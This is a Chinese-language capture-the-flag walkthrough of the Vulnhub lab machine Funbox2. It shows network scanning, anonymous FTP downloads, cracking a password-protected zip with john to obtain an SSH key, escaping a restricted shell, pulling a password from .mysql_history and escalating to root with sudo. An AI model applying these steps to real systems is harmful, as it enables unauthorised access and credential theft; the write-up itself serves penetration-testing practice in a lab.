Funbox2
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.116.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.161 08:00:27:f8:00:eb 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.161
NMAP扫描
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.161 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 22:14 EST
Nmap scan report for bogon (192.168.56.161)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:F8:00:EB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds
目标主机经NMAP扫描显示仅有3个开放端口: 21(FTP),22(ssh),80(http)
Get Access
首先从FTP服务开始,目标主机允许匿名范围,并且有zip压缩文件:
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ftp 192.168.56.161
Connected to 192.168.56.161.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.161]
Name (192.168.56.161:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user [email protected] !
230-
230-The local time is: Tue Nov 08 03:15:44 2022
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||49020|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete
ftp> get anna.zip
local: anna.zip remote: anna.zip
229 Entering Extended Passive Mode (|||46677|)
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.65 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.16 MiB/s)
ftp> get ariel.zip
local: ariel.zip remote: ariel.zip
229 Entering Extended Passive Mode (|||51357|)
150 Opening BINARY mode data connection for ariel.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.50 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.47 MiB/s)
ftp> get bud.zip
local: bud.zip remote: bud.zip
229 Entering Extended Passive Mode (|||50686|)
150 Opening BINARY mode data connection for bud.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.51 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (157.49 KiB/s)
ftp> get cathrine.zip
local: cathrine.zip remote: cathrine.zip
229 Entering Extended Passive Mode (|||64610|)
150 Opening BINARY mode data connection for cathrine.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.95 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.61 MiB/s)
ftp> get homer.zip
local: homer.zip remote: homer.zip
229 Entering Extended Passive Mode (|||54262|)
150 Opening BINARY mode data connection for homer.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.65 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.64 MiB/s)
ftp> get jessica.zip
local: jessica.zip remote: jessica.zip
229 Entering Extended Passive Mode (|||13991|)
150 Opening BINARY mode data connection for jessica.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.23 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.37 MiB/s)
ftp> get john.zip
local: john.zip remote: john.zip
229 Entering Extended Passive Mode (|||43465|)
150 Opening BINARY mode data connection for john.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.70 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.77 MiB/s)
ftp> get marge.zip
local: marge.zip remote: marge.zip
229 Entering Extended Passive Mode (|||22454|)
150 Opening BINARY mode data connection for marge.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.78 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.50 MiB/s)
ftp> get miriam.zip
local: miriam.zip remote: miriam.zip
229 Entering Extended Passive Mode (|||15812|)
150 Opening BINARY mode data connection for miriam.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 3.00 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.90 MiB/s)
ftp> get tom.zip
local: tom.zip remote: tom.zip
229 Entering Extended Passive Mode (|||46681|)
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 1.93 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.05 MiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||36931|)
150 Opening BINARY mode data connection for welcome.msg (170 bytes)
100% |***********************************************************************************************************************************************************************************************| 170 9.00 MiB/s 00:00 ETA
226 Transfer complete
170 bytes received in 00:00 (790.54 KiB/s)
ftp> get zlatan.zip
local: zlatan.zip remote: zlatan.zip
229 Entering Extended Passive Mode (|||30105|)
150 Opening BINARY mode data connection for zlatan.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************| 1477 2.72 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.13 MiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ls
anna.zip ariel.zip bud.zip cathrine.zip homer.zip jessica.zip john.zip marge.zip miriam.zip nmap_full_scan tom.zip welcome.msg zlatan.zip
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <root@%L>.
将这些zip压缩文件下载到Kali Linux本地。
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ unzip anna.zip
Archive: anna.zip
[anna.zip] id_rsa password:
! anna_hash : No such file or directory
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john anna.zip > anna_hash
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt anna_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-07 22:19) 0g/s 8853Kp/s 8853Kc/s 8853KC/s !LUVDKR!..*7¡Vamos!
Session completed.
从文件名的规律看,应该是一系列用户名,而且可能是ssh 私钥文件,但是无法破解,可能这是一个陷阱,但是我们注意到所有zip文件的权限并不完全相同,只有tom.zip没有写权限
试一下破解这个文档:
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john tom.zip > tom_hash
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt tom_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2022-11-07 22:21) 25.00g/s 102400p/s 102400c/s 102400C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
利用john破解工具很快就拿到了口令,用该口令打开tom.zip压缩文件,从而成功登录tom的shell
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ssh -i id_rsa [email protected]
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Nov 8 03:23:16 UTC 2022
System load: 0.16 Processes: 98
Usage of /: 65.1% of 4.37GB Users logged in: 0
Memory usage: 34% IP address for enp0s3: 192.168.56.161
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Sat Jul 25 12:25:33 2020 from 192.168.178.143
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd /var/www
-rbash: cd: restricted
tom@funbox2:~$
这是一个受限的shell, 但是输入bash -i,即可成为Interactive shell,
也可以通过下面的方法获得交互式shell:
tom@funbox2:/var/www/html$ cd /home
tom@funbox2:/home$ ls
tom
tom@funbox2:/home$ cd tome
bash: cd: tome: No such file or directory
tom@funbox2:/home$ cd tom
tom@funbox2:~$ ls
tom@funbox2:~$ ls -alh
total 40K
drwxr-xr-x 5 tom tom 4.0K Jul 25 2020 .
drwxr-xr-x 3 root root 4.0K Jul 25 2020 ..
-rw------- 1 tom tom 6 Jul 25 2020 .bash_history
-rw-r--r-- 1 tom tom 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 tom tom 3.7K Apr 4 2018 .bashrc
drwx------ 2 tom tom 4.0K Jul 25 2020 .cache
drwx------ 3 tom tom 4.0K Jul 25 2020 .gnupg
-rw------- 1 tom tom 295 Jul 25 2020 .mysql_history
-rw-r--r-- 1 tom tom 807 Apr 4 2018 .profile
drwx------ 2 tom tom 4.0K Jul 25 2020 .ssh
-rw-r--r-- 1 tom tom 0 Jul 25 2020 .sudo_as_admin_successful
-rw------- 1 tom tom 0 Jul 25 2020 .viminfo
tom@funbox2:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$
这里似乎有用户名和密码: tom xx11yy22! (\040是空格编码)
接下来就简单了:
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tom may run the following commands on funbox2:
(ALL : ALL) ALL
tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom# cd /root
root@funbox2:~# ls
flag.txt
root@funbox2:~# cat flag.txt
____ __ __ _ __ ___ ____ _ __ ___
/ __/ / / / / / |/ / / _ ) / __ \ | |/_/ |_ |
/ _/ / /_/ / / / / _ |/ /_/ / _> < / __/
/_/ \____/ /_/|_/ /____/ \____/ /_/|_| __ /____/
____ ___ ___ / /_ ___ ___/ / / /
_ _ _ / __// _ \/ _ \/ __// -_)/ _ / /_/
(_)(_)(_)/_/ \___/\___/\__/ \__/ \_,_/ (_)
from @0815R2d2 with ♥
root@funbox2:~#
成功拿到root flag!!!
标签:ftp,00,rw,zip,Vulnhub,tom,靶机,Funbox2,1477 From: https://www.cnblogs.com/jason-huawen/p/16869179.html